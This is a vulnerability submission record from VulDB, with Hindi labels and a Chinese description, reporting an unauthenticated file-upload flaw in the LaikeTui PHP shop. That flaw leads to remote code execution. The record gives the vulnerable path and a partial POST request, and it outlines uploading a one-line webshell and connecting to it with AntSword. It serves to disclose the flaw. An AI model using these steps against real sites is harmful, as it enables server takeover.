| शीर्षक | The laiketui program has a remote code execution vulnerability |
|---|
| विवरण | php版本
路径:LKT/webapp/modules/api/actions/userAction.class.php
POST /LKT/index.php?module=api&action=user&m=upload HTTP/1.1
Host:
Accept: */*
Accept-Encoding: identity
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=--------------------------371918364269932091066326
这个url直接以multipart/form-data的post数据格式直接写入一句话木马,然后就会返回其文件名,然后antsword连接就可以 |
|---|
| स्रोत | ⚠️ https://github.com/bettershop/LaikeTui |
|---|
| उपयोगकर्ता | p1nk (UID 40417) |
|---|
| सबमिशन | 23/08/2023 09:01 PM (3 साल पहले) |
|---|
| संयम | 27/08/2023 08:15 AM (3 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 238160 [Bettershop LaikeTui POST Request index.php?module=api&action=user&m=upload अधिकार वृद्धि] |
|---|
| अंक | 20 |
|---|